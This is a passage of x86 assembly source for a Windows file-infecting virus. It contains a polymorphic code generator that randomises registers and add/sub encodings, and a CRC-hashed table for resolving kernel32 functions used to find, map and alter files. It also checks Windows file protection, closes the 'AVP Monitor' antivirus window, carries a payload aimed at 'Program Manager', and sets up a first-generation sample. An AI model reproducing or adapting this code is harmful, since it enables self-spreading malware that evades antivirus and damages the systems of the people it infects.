pop ebx ecx ; restore regs
sub ecx,edx
add ebx,eax ; add encoded size
loop encodeCmpLoop1
pop ecx ; get loops
pop edx ; get ptr addr
mov dword ptr [edx],ebx ; fix op2 jmp
pop edx ; get old prt
mov eax,edi
sub eax,edx ; calc added size
mov edx,ecx ; move loops here
dec edx
; mov reg,a
; push reg
push ecx ebx ; save loop and size
push edi ; save prt addr
lodsd ; get dword
push eax ; save value
call GetReg ; get random reg
; get value
pop edx ; mov reg32,imm32
mov cl,al
push ecx
call AddMovREGIMM
pop ecx ; push reg32
push ecx
call AddPushREG
pop eax
call FreeReg ; free the register
pop edx ; get old prt
mov eax,edi
sub eax,edx ; calc added size
pop ebx ecx ; restore regs
add ebx,eax ; add encoded size
jmp doLoop
; add opcode:
; mov reg,a-b || mov reg,a+b
; add reg,b || add reg,-b
; push reg || push reg
; sub opcode:
; mov reg,a-b || mov reg,a+b
; add reg,b || add reg,-b
; push reg || push reg
; ret eax enc size
call GetReg ; get rnd reg
mov byte ptr [WorkReg+ebp],al
mov eax,2 ; add or sub?
push eax
call rndInRange
mov bl,al
mov eax,2 ; again, add or sub?
push eax
call rndInRange
mov bh,al
mov eax,0ffffffffh ; get a random dword value
push eax
call rndInRange
push edi ; save current dest
push eax ; save rnd value
lodsd ; get dword
mov edx,eax
pop eax ; get rnd value
or bl,bl
jz doAdd0
add edx,eax ; add dword rnd value
add edx,eax
sub edx,eax ; sub dword rnd value
push eax ; store rnd value
mov cl,byte ptr [WorkReg+ebp]
call AddMovREGIMM
pop edx ; get rnd value
or bh,bh ; add or sub opcode
jz doSub0
or bl,bl ; add: add or sub?
jz doAdd1
not edx
inc edx
mov cl,byte ptr [WorkReg+ebp]
call AddAddREGIMM
jmp doSub2
or bl,bl ; sub: add or sub?
jnz doSub1
not edx
inc edx
mov cl,byte ptr [WorkReg+ebp]
call AddSubREGIMM
mov cl,byte ptr [WorkReg+ebp]
call AddPushREG
mov al,byte ptr [WorkReg+ebp]
call FreeReg
pop edx ; get old dest
mov eax,edi
sub eax,edx ; calc bytes stored
_EAX equ 0
_ECX equ 1
_EDX equ 2
_EBX equ 3
_ESP equ 4
_EBP equ 5
_ESI equ 6
_EDI equ 7
; returns AL: selected register
mov eax,8
push eax
call rndInRange
lea ecx,RegStatus+ebp
add ecx,eax
mov dl,byte ptr [ecx]
or dl,dl
jnz GetReg
mov byte ptr [ecx],1
; AL: selected register to free
and eax,7
lea ecx,RegStatus+ebp
add ecx,eax
mov byte ptr [ecx],0
; Instruction generators
; EDI: Destination code
; ECX: Reg (if aplicable)
; EDX: Inm (if aplicable)
or cl,cl
jnz AddCmpREGIMM0
mov al,3dh
jmp AddCmpREGIMM1
mov al,081h
mov al,0f8h
add al,cl
mov eax,edx
mov al,0b8h
add al,cl
mov eax,edx
or cl,cl
jnz AddAddREGIMM0
mov al,05h
jmp AddAddREGIMM1
mov al,081h
mov al,0c0h
add al,cl
mov eax,edx
or cl,cl
jnz AddSubREGIMM0
mov al,2dh
jmp AddSubREGIMM1
mov al,081h
mov al,0e8h
add al,cl
mov eax,edx
mov al,050h
add al,cl
mov al,058h
add al,cl
; api search data ----------------------------------------------------------
address dd 0
names dd 0
ordinals dd 0
nexports dd 0
expcount dd 0
FSTAPI label byte
CrcCloseHandle dd 068624a9dh
db 12
_CloseHandle dd 0
CrcCreateFileA dd 08c892ddfh
db 12
_CreateFileA dd 0
CrcCreatFileMappingA dd 096b2d96ch
db 19
_CreateFileMappingA dd 0
CrcFreeLibrary dd 0afdf191fh
db 12
_FreeLibrary dd 0
CrcGetProcAddress dd 0ffc97c1fh
db 15
_GetProcAddress dd 0
CrcGetFileTime dd 04434e8feh
db 12
_GetFileTime dd 0
CrcGetFileAttributesA dd 0c633d3deh
db 19
_GetFileAttributesA dd 0
CrcGetFileSize dd 0ef7d811bh
db 12
_GetFileSize dd 0
CrcFindFirstFileA dd 0ae17ebefh
db 15
_FindFirstFileA dd 0
CrcFindNextFileA dd 0aa700106h
db 14
_FindNextFileA dd 0
CrcFindClose dd 0c200be21h
db 10
_FindClose dd 0
CrcGetCurrentDirectoryA dd 0ebc6c18bh
db 21
_GetCurrentDirectoryA dd 0
CrcGetSystemDirectoryA dd 0593ae7ceh
db 20
_GetSystemDirectoryA dd 0
CrcGetSystemTime dd 075b7ebe8h
db 14
_GetSystemTime dd 0
CrcGetWindowsDirectoryA dd 0fe248274h
db 21
_GetWindowsDirectoryA dd 0
CrcGetLastError dd 087d52c94h
db 13
_GetLastError dd 0
CrcGetTickCount dd 0613fd7bah
db 13
_GetTickCount dd 0
CrcLoadLibraryA dd 04134d1adh
db 13
_LoadLibraryA dd 0
CrcMapViewOfFile dd 0797b49ech
db 14
_MapViewOfFile dd 0
CrcSetCurrentDirectoryA dd 0b2dbd7dch
db 21
_SetCurrentDirectoryA dd 0
CrcSetFileTime dd 04b2a3e7dh
db 12
_SetFileTime dd 0
CrcSetFileAttributesA dd 03c19e536h
db 19
_SetFileAttributesA dd 0
CrcUnmapViewOfFile dd 094524b42h
db 16
_UnmapViewOfFile dd 0
CrcVirtualAlloc dd 04402890eh
db 13
_VirtualAlloc dd 0
ENDAPI label byte
; non kernel32 apis --------------------------------------------------------
imagehlpdllStr db 'IMAGEHLP.DLL',0
imagehlpdllHnd dd 0
CheckSumMappedFileStr db 'CheckSumMappedFile',0
_CheckSumMappedFile dd 0
sfcdllStr db 'SFC.DLL',0
sfcdllHnd dd 0
SfcIsFileProtectedStr db 'SfcIsFileProtected',0
_SfcIsFileProtected dd 0
user32dllStr db 'USER32.DLL',0
user32dllHnd dd 0
FindWindowAStr db 'FindWindowA',0
_FindWindowA dd 0
PostMessageAStr db 'PostMessageA',0
_PostMessageA dd 0
; misc data ----------------------------------------------------------------
; i use the same code of the payload to close avp monitor
avStr db 'AVP Monitor',0
; hu hu, just end 1 app hehehe
payloadStr db 'Program Manager',0
; infection data -----------------------------------------------------------
path0 dd 0
path1 dd 0
fileMappingObj db '1234567890',0
virusSample dd 0
fileTime0 dd 0,0
fileTime1 dd 0,0
fileTime2 dd 0,0
fileAttrib dd 0
fileSize dd 0
ofileSize dd 0
ochksum dd 0
nchksum dd 0
padding dd 0
genSize dd 0
fHnd dd 0
fhmap dd 0
mapMem dd 0
find_data WIN32_FIND_DATA <0>
findHnd dd 0
fndMask db '*.*',0
tmpExt dd 0
infCount db 0
; very important this aligment for virus encoding
align 4h
vEnd label byte
; Fake host needed for 1st gen
push 1000h
call title
db 'virus activated',0
title: call mess
db 'Kelvin, welcome to Solaris.',0
push 0h
call MessageBoxA
push 0h
call ExitProcess
; This is another way to setup the 1st generation virus sample.
lea esi,restoreCode ; restore original code
lea edi,vBegin
mov ecx,restoreSize
rep movsb
mov dword ptr [encKey],0 ; 1st loop key=0
pushad ; setup stack
sub esp,vSize
; we must push 2 times the same offset, no mather wich one
push offset reloc1stGen ; setup reloc stuff
push offset reloc1stGen ; setup reloc stuff
; emul jmp esp
add esp,8
jmp inicio
; original code replazed by the jmp to setupVirus to be
; restored at its original plaze
sub esp,8
mov esi,dword ptr [esp+vSize+28h]
restoreSize equ $-restoreCode
End inicio
; ah... who's Kelvin? fuck!
; just read the book :]